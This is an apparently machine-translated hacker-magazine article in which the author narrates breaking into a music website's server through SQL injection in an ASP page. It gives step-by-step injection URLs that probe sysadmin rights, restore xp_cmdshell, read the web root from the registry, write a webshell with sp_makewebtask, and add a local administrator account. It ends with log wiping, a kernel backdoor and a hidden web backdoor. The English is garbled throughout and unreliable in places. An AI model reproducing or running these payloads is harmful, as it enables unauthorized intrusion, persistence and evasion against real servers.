Easy to easily: Intermediate Suitable Object: Script Technology Lovers Front Knowledge: SQL Injecting Basic Knowledge WTF: This article Xiaobian Today is coming "Guest", this version editor, because friends "smell!" Give me this article The importance and sensitivity of repeated complications, so this boy is boy, huh, huh. Gossip is less, this is definitely a real safety test article, which is also very ornaable. In some questions, it is possible to go into a detour, but it is to explain a thinking for everyone, so the idea of key solving problems is the most worth learning. The author of this article has an in-depth understanding of script injection vulnerabilities, and has a new thinking analysis of invasion. If you have a strong interest in scripting but it is difficult to have a chance to be actually fighting, can you miss this article? If the previous script attack is only in the web level, this article is deep into the system level, because the most fascinating place in SQL lies in its powerful features, and many of which are not known is the most fascinating ! Many technologies in this article are definitely the first time! bring it on! The mysterious veil will slowly uncover! Empty script attack - use pure script technology to obtain system permission text / map odor, currently popular SQL INJECTION vulnerability, that is, we usually say SQL injection vulnerability, we use this kind of vulnerability to cross-table, cross-library query Database information, as well as to upload files through the forum to get the host Webshell (these are some very common methods, and the black defense introduces more detailed). Some time ago I conducted a large music toll website for a large music fee. As a result, I used pure script technology to get system administrator privileges. So, today I will introduce all the concrete ideas for all and my specific ideas.
One. Stepping on the point is a primary job for a security test for a server. Let's take a port scan for the server. I took out a very good scanner written by my friends, the speed is quite fast, you can open 2000 threads at the same time! (WTF: Good!) Half Skills, the port 1-65535 is over. The open port of the scan is as follows: 21, 80, 1433, 3389 The result of scanning again is the same, and almost certainly it is. After the impact wave, the server on the network has a lot of security, and the system vulnerability invasion has become difficult. Let me analyze it first: I set the target in 21 and 1433 ports. Now I only look at luck, see if I can sweep out a weak password (WTF: Oh, I want to be very beautiful!) - I am unlucky, I haven't swept it for a long time, I have a moving machine, what is the same today, what Didn't sweep it out. It seems that I only look for an exit from the website script.
two. Fully exploring the website has opened a 1433 port, that is, SQL Server service. General websites are scheduled for the ASP MSSQL structure, and the injection vulnerability of the ASP script is better than other script, and the vulnerability is also relatively large. many. Under normal circumstances, I add single quotes after the parameters submitted. If the parameter is not filtered, IE generally returns an error message. I quickly found a parameter without any filtering. Submit http://www.something.com/script.asp?id=2'ie returns:
Submit http://www.something.com/script.asp?id=2 and 1 = 1IE Returns normal record. Submit http://www.something.com/script.asp?id=2 and 1 = 2IE has not returned. Ok, this is determined that there is a vulnerability, let's take advantage of this vulnerability to get some information about the server and database. For example, if you want to see the patch of the server, we submit: http://www.something.com/script.asp? Id = 2 and 1 = (Select @@ version) error, huh, IE, return to us to return to the error message As shown in Figure 1: Figure 1 seems to play the SP4 patch, "It is said" After the SP4, there is also an overflow program for 80 and the overflow of MSSQL SP3. However, these are "absolute confidential", it is estimated that there are few people who can get it, and I don't have it anyway, I will take him on that day! Now let's continue! This server is more secure from the system, so I still have to start from scripting. Let's take a look at the permissions of his database connection account, submit: http://www.something.com/script.asp? Id = 2 and 1 = (select is_srvrolemember ('sysadmin')) returns to normal, this proves current connection The account is the server role sysadmin authority. WTF: Is_SrvroleMember ('role' [, 'login'] function is used to determine if the current user login is a member of the specified server role. Among them, Role is the name of the server role being checked. Login is optional, if not specified, then use the current user's login account. If Login is a member of the Role, return 1, not returning 0, if the Role or Login is invalid, then return NULL. I almost didn't spray a tea in my mouth on the computer screen. The server role currently connected to the account is actually sysadmin permissions! as shown in picture 2:
Figure 2 Haha! It seems that the connection account is connected to the SA account. Submitted: http://www.something.com/script.asp? Id = 2 and 'sa' = (select system_user) Used to see if the connection account is connected to the SA, IE returns to normal again. This proves that the connection account is really sa, it seems that the permissions are so high. WTF: When using the application role, execute the Select User will return the name of the currently used application role. If you want to get the identity of the logged in user, use the Transact-SQL statement: SELECT System_User. Here, many people may think of using the XP_cmdshell extension stored procedure to add system accounts, and then use the terminal to connect the server. This is very good idea! I am also a member of many people! Let's try to see it!
three. Use the MSSQL stored procedure to get the WebShell, let's see if Xp_cmdshell is deleted by the administrator! Submitted: http://www.something.com/script.asp? Id = 2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') IE Returns The message is below:
It seems that XP_cmdshell has been deleted. Oh, let's recover him! http://www.something.com/script.asp?id=2 ;Exec Master.dbo.sp_addextendedProc 'XP_CMDSHELL', 'XPLOG70.DLL' Try again, see XP_CMDSHELL is recovering? http: // www. Something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') WTF: Xiaobian in later attempts, found What is the XP_cmdshell recovery? Haha, I don't know which brother left the result? The same is not returned. This proves that the administrator is renamed this dynamic link library of XPLog70.dll. If you don't delete it, it seems that direct recovery is no way. In this regard, I can only say two words "I forbearance"! Such a lot of vulnerabilities, it is not good to use it, I am not willing to say this, it is powerful. Let's talk about him first, hey, after getting Webshell, I naturally have a way to deal with him, hahaha ... (Stariser smile!). See how to get WebShell! Have you seen n.e.v.e.r and czy's article? Take the Webshell method, both have been introduced in detail. I also write their methods into procedures, convenient for me, but it is difficult to get the web absolute path. Where is the Trojan we generated? This may be a problem that many cattle have been studying. Fortunately, I still understand MSSQL. I have a way to get his web absolute path, come with me. (WTF: This is definitely a very very big flash point! Everyone sees!) Let's take advantage of two MSSQL stored procedures. However, it is necessary to introduce you to the XP_REGREAD extension stored procedure and sp_makewebtask web assistant stored procedure: XP_REGREAD is used to read the registry information, and we get this stored procedure to save the web absolute path in the registry. SP_MAKEWEBTASK is used here to get WebShell, its main function is to export records for the table in the database, and the file name you can specify yourself. Of course, we specify as an ASP script file! Imagine if the script code is saved in the table, the file is the script file. So, the record we add is the script code. Here I don't have to use n.e.v.e.r. His way is to export library files, exported files are relatively large, and many garbled looks inconvenient, if there is an ASP tag, there is a wrong ASP code, it is not good, open Most Return 500 error The code, so we use CZY methods, which is the web job to get the shell.
1. How can I get the web absolute path? Ha ha? This problem, I spent a long time to study. Everyone knows that MS's things are placed in the registry. We can get in the registration table, the location is as follows: hkey_local_machine / system / controlset001 / service / w3svc / parameters / virtual roots Utilize the stored procedure XP_REGREAD We can get Its value .Exec master.dbo.xp_regread ',' system / controlset001 / services / w3svc / parameters / virtual roots', '/' This is taken, but the problem is coming, it is taken out. How do we return its value in IE? My method is: Create a temporary table, add a field in the table, type: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable. Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. Submit: DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @result output into a temporary table (field name provisional) insert VALUES (@Result); - then let us submit: 1 = (Select Count (*) from temporary table where temporary field name> 1) This IE reports the value of the web path you just plugged in. . I also tried to use the variable to report the error, let IE return the value of the variable, the result is failed, so I think the way to build a temporary table add data! Finally, we delete the temporary table of the original built. WebShell gets it, and the work will tell a paragraph.
2. How do I get the article of WebShell? CZY has been written very detailed. So, I just simply mention it! Create a table, build a field, and add the contents of the Trojan to this field. Then, the content is exported to the ASP script in the web absolute path via the XP_MAKEWEBTASK stored procedure. Remove the built-in temporary table again, everything over. Such as: execute sp_makewebtask @outputfile = 'web absolute path / export file name .asp', @ query = 'SELECT Your field from you, you build a temporary table' Oh, the result will come out. Of course, I have written a procedure, so I don't have to have trouble yourself and a line of add data (WTF: this article has a detailed introduction! Everyone will not be disappointed!). Methods and ideas are written, now let's take action. Still look at it first, his two extended stored procedures have been deleted. If I was deleted, I don't want to live! Oh, submit: http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from master.dbo.sysObjects where name = 'xp_regread') Add: http: // Www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where name = 'sp_makewebtask') La la la! What day is today, I am happy than the New Year. All returned to normal! The two stored procedures to be used are not deleted. WTF Note: General administrators will not delete these two, maybe less understanding them, and will not pay attention to them! The crisis is in this!嘿嘿. Ok, after getting a web absolute path. Continue to build a table: http://www.something.com/script.asp? Id = 2; Create Table [DBO]. [Cyfd] ([GYFD] [char] (255)); then we have successfully built A table named CYFD and adding a type of Char, a field name GYFD with a length of 255. Then add data to the table: http://www.something.com/script.asp? Id = 2; declare @Result varchar (255) exec master.dbo.xp_regread 'hkey_local_machine', 'System / Controlset001 / Services / W3SVC / Parameters / virtual roots', '/', @Result Output INSERT INTO CYFD (@Result); - Read the web absolute path from the registry, then insert the path into the table just built. Then report the absolute path of WebShell: http://www.something.com/script.asp? Id = 2 and 1 = (Select Count (*) from cyfd where gyfd> 1) After the error, IE returns an error, we get Web absolute path "D: / INETPUB / WWWROOT"! After the effort, it is very sweet! Drink tea! Figure 3
Figure 3 and then delete the table just built, submitted: http://www.something.com/script.asp? ID = 2; Drop Table Cyfd; - OK, there is a path under the path. Open the program I wrote to get the WebShell, enter the vulnerability urlhttp://www.yfd.com/yfd.com? Id = 2 Enter the absolute path to save Trojans: D: / inetpub / wwwroot. Trojan, I have been configured, the code is streamlined and streamlined, only 30 lines of code, so that the data is submitted to the server. Accelerate speed! The main function of the Trojan is the input content, saving the input content as a file. Oh, through such a Trojan, we can achieve some powerful script Trojans, such as ocean horses. Not a minute. The programs have been running. Enter the corresponding path, Wahaha (WTF: The brothers who want to eat are quite this "drink"? Haha!), Webshell is coming, the fastest generation has produced a marine Trojan, as shown in Figure 4, Figure 5: Figure 4
Figure 5 I live in happiness! - wtf often says this sentence, I seem to have been infected today! Below we have come!
four. Restore xp_cmdshell, enter system authority! The following work is very simple, it is very easy. If you don't get 10 minutes, you will give you an administrator account, saying XP_cmdshell has been deleted. And it is impossible to recover, this is the administrator to delete the XPLog70.dll file, or no name. Nothing, let's upload an XPLog70.dll to get everything, through WebShell. I quickly uploaded the XPLog70.dll file to the E: / INETPUB / WWWROOT directory, come, let's return to him, submit: http://www.something.com/script.asp? Id = 2; exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'E: /inetpub/wwrowroot/xplog70.dll' recovery, supports the absolute path recovery. :) Figure 6
Figure 6ok. We use IE to see if it has been restored. Submitted: http://www.something.com/script.asp? Id = 2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 嘿嘿. Returns normal. Has been restored, do you still use me? Ha ha! Plus account: http://www.something.com/script.asp? Id = 2; exec master.dbo.xp_cmdshell 'net user chouyfd Chouyfd1314yf / add' upgraded ourselves for super administrators http://www.something.com /script.asp?id=2 ;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd / add' is over. Open your terminal connection, join! Haha, finally gave me. At this point, I successfully got the system administrator account of this host. Figure 7:
Figure 7 The following work is to clear the log and leave a super back door, flash people!
Fives. Afterwards, after the work terminal is connected, remove the IIS log, and the MSSQL log at the fastest speed. At the same time, put XP_cmdshell also deleted him, don't let him find it, it will not do it. Move my XPLOG70.DLL I uploaded to the system32 directory, change I don't know what it means: msxlog32.dll (kill him, I can't find it, haha!) Will provide * Egg super The kernel back door program is installed, and the script file with a vulnerability is put on the patch. At the same time in his script, I modified the code, submit a specific parameter (POST prompt), showing my web backdoor program! This two back doors are very insurance! What are you afraid of? Just a New Year, I am so happy! Postscript: There are many places where you may have a lot of places, the space is limited, if necessary, communicate directly with me! : DY-E@163.net, this time you get the system administrator account through scripting technology. This is also the result I have learned in depth to MSSQL for a long time. This article is mainly because the invasion is displayed, and the intrusion method is a variety of ways. I hope this article is helping everyone. I wish you all a happy year and good luck!
